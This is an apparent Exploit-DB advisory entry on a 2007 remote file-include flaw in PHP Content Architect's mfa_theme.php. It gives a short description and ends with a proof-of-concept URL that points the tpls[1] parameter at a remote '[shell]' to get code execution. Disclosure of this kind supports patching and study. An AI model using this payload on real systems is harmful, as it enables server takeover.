PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability

2007-05-07T00:00:00
ID EDB-ID:29953
Type exploitdb
Reporter kezzap66345
Modified 2007-05-07T00:00:00

Description

PHP Content Architect 0.9 pre 1.2 MFA_Theme.PHP Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23843/info

PHP Content Architect is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

PHP Content Architect 0.9 pre 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell]